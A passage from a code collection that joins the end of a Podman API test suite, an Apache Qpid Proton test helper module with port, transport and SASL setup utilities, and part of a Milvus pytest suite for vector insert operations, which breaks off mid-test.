r.status_code, f"podman images pull docker.io/alpine:latest {r.text}"
)
@classmethod
def tearDownClass(cls):
TestApi.service.terminate()
stdout, stderr = TestApi.service.communicate(timeout=0.5)
if stdout:
sys.stdout.write("\nService Stdout:\n" + stdout.decode("utf-8"))
if stderr:
sys.stderr.write("\nService Stderr:\n" + stderr.decode("utf-8"))
return super().tearDownClass()
def test_info(self):
r = requests.get(_url("/info"))
self.assertEqual(r.status_code, 200)
self.assertIsNotNone(r.content)
_ = json.loads(r.text)
def test_events(self):
r = requests.get(_url("/events?stream=false"))
self.assertEqual(r.status_code, 200, r.text)
self.assertIsNotNone(r.content)
for line in r.text.splitlines():
obj = json.loads(line)
# Actor.ID is uppercase for compatibility
_ = obj["Actor"]["ID"]
def test_containers(self):
r = requests.get(_url("/containers/json"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.text)
self.assertEqual(len(obj), 0)
def test_containers_all(self):
r = requests.get(_url("/containers/json?all=true"))
self.assertEqual(r.status_code, 200, r.text)
validateObjectFields(r.text)
def test_inspect_container(self):
r = requests.get(_url(ctnr("/containers/{}/json")))
self.assertEqual(r.status_code, 200, r.text)
obj = validateObjectFields(r.content)
_ = parse(obj["Created"])
def test_stats(self):
r = requests.get(_url(ctnr("/containers/{}/stats?stream=false")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
validateObjectFields(r.text)
def test_delete_containers(self):
r = requests.delete(_url(ctnr("/containers/{}")))
self.assertEqual(r.status_code, 204, r.text)
def test_stop_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_start_containers(self):
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_restart_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/restart")), timeout=5)
self.assertEqual(r.status_code, 204, r.text)
def test_resize(self):
r = requests.post(_url(ctnr("/containers/{}/resize?h=43&w=80")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertIsNone(r.text)
def test_attach_containers(self):
self.skipTest("FIXME: Test timeouts")
r = requests.post(_url(ctnr("/containers/{}/attach")), timeout=5)
self.assertIn(r.status_code, (101, 500), r.text)
def test_logs_containers(self):
r = requests.get(_url(ctnr("/containers/{}/logs?stdout=true")))
self.assertEqual(r.status_code, 200, r.text)
def test_post_create(self):
self.skipTest("TODO: create request body")
r = requests.post(_url("/containers/create?args=True"))
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_commit(self):
r = requests.post(_url(ctnr("/commit?container={}")))
self.assertEqual(r.status_code, 200, r.text)
validateObjectFields(r.text)
def test_images(self):
r = requests.get(_url("/images/json"))
self.assertEqual(r.status_code, 200, r.text)
validateObjectFields(r.content)
def test_inspect_image(self):
r = requests.get(_url("/images/alpine/json"))
self.assertEqual(r.status_code, 200, r.text)
obj = validateObjectFields(r.content)
_ = parse(obj["Created"])
def test_delete_image(self):
r = requests.delete(_url("/images/alpine?force=true"))
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_pull(self):
r = requests.post(_url("/images/pull?reference=alpine"), timeout=15)
self.assertEqual(r.status_code, 200, r.status_code)
text = r.text
keys = {
"error": False,
"id": False,
"images": False,
"stream": False,
}
# Read and record stanza's from pull
for line in str.splitlines(text):
obj = json.loads(line)
key_list = list(obj.keys())
for k in key_list:
keys[k] = True
self.assertFalse(keys["error"], "Expected no errors")
self.assertTrue(keys["id"], "Expected to find id stanza")
self.assertTrue(keys["images"], "Expected to find images stanza")
self.assertTrue(keys["stream"], "Expected to find stream progress stanza's")
def test_search(self):
# Had issues with this test hanging when repositories not happy
def do_search():
r = requests.get(_url("/images/search?term=alpine"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
search = Process(target=do_search)
search.start()
search.join(timeout=10)
self.assertFalse(search.is_alive(), "/images/search took too long")
def test_ping(self):
r = requests.get(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
r = requests.head(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
if __name__ == "__main__":
unittest.main()
|
common.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from unittest import TestCase
try:
from unittest import SkipTest
except:
try:
from unittest2 import SkipTest
except:
class SkipTest(Exception):
pass
from random import randint
from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
from subprocess import Popen,PIPE,STDOUT
import sys, os, string, subprocess
from proton import Connection, Transport, SASL, Endpoint, Delivery, SSL
from proton.reactor import Container
from proton.handlers import CHandshaker, CFlowController
from string import Template
if sys.version_info[0] == 2 and sys.version_info[1] < 6:
# this is for compatibility, apparently the version of jython we
# use doesn't have the next() builtin.
# we should remove this when we upgrade to a python 2.6+ compatible version
# of jython
#_DEF = object() This causes the test loader to fail (why?)
class _dummy(): pass
_DEF = _dummy
def next(iter, default=_DEF):
try:
return iter.next()
except StopIteration:
if default is _DEF:
raise
else:
return default
# I may goto hell for this:
import __builtin__
__builtin__.__dict__['next'] = next
def free_tcp_ports(count=1):
""" return a list of 'count' TCP ports that are free to used (ie. unbound)
"""
retry = 0
ports = []
sockets = []
while len(ports) != count:
port = randint(49152, 65535)
sockets.append( socket( AF_INET, SOCK_STREAM ) )
try:
sockets[-1].bind( ("0.0.0.0", port ) )
ports.append( port )
retry = 0
except:
retry += 1
assert retry != 100, "No free sockets available for test!"
for s in sockets:
s.close()
return ports
def free_tcp_port():
return free_tcp_ports(1)[0]
def pump_uni(src, dst, buffer_size=1024):
p = src.pending()
c = dst.capacity()
if c < 0:
if p < 0:
return False
else:
src.close_head()
return True
if p < 0:
dst.close_tail()
elif p == 0 or c == 0:
return False
else:
binary = src.peek(min(c, buffer_size))
dst.push(binary)
src.pop(len(binary))
return True
def pump(transport1, transport2, buffer_size=1024):
""" Transfer all pending bytes between two Proton engines
by repeatedly calling peek/pop and push.
Asserts that each engine accepts some bytes every time
(unless it's already closed).
"""
while (pump_uni(transport1, transport2, buffer_size) or
pump_uni(transport2, transport1, buffer_size)):
pass
def findfileinpath(filename, searchpath):
"""Find filename in the searchpath
return absolute path to the file or None
"""
paths = searchpath.split(os.pathsep)
for path in paths:
if os.path.exists(os.path.join(path, filename)):
return os.path.abspath(os.path.join(path, filename))
return None
def isSSLPresent():
return SSL.present()
createdSASLDb = False
def _cyrusSetup(conf_dir):
"""Write out simple SASL config.
"""
saslpasswd = ""
if 'SASLPASSWD' in os.environ:
saslpasswd = os.environ['SASLPASSWD']
else:
saslpasswd = findfileinpath('saslpasswd2', os.getenv('PATH')) or ""
if os.path.exists(saslpasswd):
t = Template("""sasldb_path: ${db}
mech_list: EXTERNAL DIGEST-MD5 SCRAM-SHA-1 CRAM-MD5 PLAIN ANONYMOUS
""")
abs_conf_dir = os.path.abspath(conf_dir)
subprocess.call(args=['rm','-rf',abs_conf_dir])
os.mkdir(abs_conf_dir)
db = os.path.join(abs_conf_dir,'proton.sasldb')
conf = os.path.join(abs_conf_dir,'proton-server.conf')
f = open(conf, 'w')
f.write(t.substitute(db=db))
f.close()
cmd_template = Template("echo password | ${saslpasswd} -c -p -f ${db} -u proton user")
cmd = cmd_template.substitute(db=db, saslpasswd=saslpasswd)
subprocess.call(args=cmd, shell=True)
os.environ['PN_SASL_CONFIG_PATH'] = abs_conf_dir
global createdSASLDb
createdSASLDb = True
# Globally initialize Cyrus SASL configuration
if SASL.extended():
_cyrusSetup('sasl_conf')
class DefaultConfig:
defines = {}
class Test(TestCase):
config = DefaultConfig()
def __init__(self, name):
super(Test, self).__init__(name)
self.name = name
def configure(self, config):
self.config = config
def default(self, name, value, **profiles):
default = value
profile = self.config.defines.get("profile")
if profile:
default = profiles.get(profile, default)
return self.config.defines.get(name, default)
@property
def delay(self):
return float(self.default("delay", "1", fast="0.1"))
@property
def timeout(self):
return float(self.default("timeout", "60", fast="10"))
@property
def verbose(self):
return int(self.default("verbose", 0))
class Skipped(SkipTest):
skipped = True
class TestServer(object):
""" Base class for creating test-specific message servers.
"""
def __init__(self, **kwargs):
self.args = kwargs
self.reactor = Container(self)
self.host = "127.0.0.1"
self.port = 0
if "host" in kwargs:
self.host = kwargs["host"]
if "port" in kwargs:
self.port = kwargs["port"]
self.handlers = [CFlowController(10), CHandshaker()]
self.thread = Thread(name="server-thread", target=self.run)
self.thread.daemon = True
self.running = True
self.conditions = []
def start(self):
self.reactor.start()
retry = 0
if self.port == 0:
self.port = str(randint(49152, 65535))
retry = 10
while retry > 0:
try:
self.acceptor = self.reactor.acceptor(self.host, self.port)
break
except IOError:
self.port = str(randint(49152, 65535))
retry -= 1
assert retry > 0, "No free port for server to listen on!"
self.thread.start()
def stop(self):
self.running = False
self.reactor.wakeup()
self.thread.join()
# Note: all following methods all run under the thread:
def run(self):
self.reactor.timeout = 3.14159265359
while self.reactor.process():
if not self.running:
self.acceptor.close()
self.reactor.stop()
break
def on_connection_bound(self, event):
if "idle_timeout" in self.args:
event.transport.idle_timeout = self.args["idle_timeout"]
def on_connection_local_close(self, event):
self.conditions.append(event.connection.condition)
def on_delivery(self, event):
event.delivery.settle()
|
test_insert.py | import pytest
from pymilvus import DataType, ParamError, BaseException
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
logging.getLogger().info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
'''
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
'''
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
'''
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
'''
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
'''
collection_name = gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
'''
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
'''
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
'''
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
'''
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
'''
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after entities
method: insert entities and build index
expected: no error raised
'''
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert entities and build index
expected: no error raised
'''
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
'''
target: test search entity after insert entity after a while
method: insert entity, sleep, and search collection
expected: no error raised
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
result = connect.insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
'''
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [i for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [1 for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim, ids)
logging.getLogger().info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
'''
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
'''
nb = insert_count
with pytest.raises(Exception) as e:
entities = gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
'''
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
'''
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
'''
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
'''
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
'''
result = connect.insert(collection, default_entities, partition_name=default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
'''
tag = gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
'''
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
'''
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
'''
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
'''
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
'''
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
'''
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
'''
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
'''
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
'''
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
'''
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
'''
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
'''
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
'''
delete_nums = 500
disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
'''
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
'''
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_multi_times(self, connect, binary_collection):
'''
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
'''
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
'''
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
'''
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
'''
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1,
metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert len(res[0]) == default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
result = connect.insert(collection, gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
'''
target: test insert vectors with different length of vectors
